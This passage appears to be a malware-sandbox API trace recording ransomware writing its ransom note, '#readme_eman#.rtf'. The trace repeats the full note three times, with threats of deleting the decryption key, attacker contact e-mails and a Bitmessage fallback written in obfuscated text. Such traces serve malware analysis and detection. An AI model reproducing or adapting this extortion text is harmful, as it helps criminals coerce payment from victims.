data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.190] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn 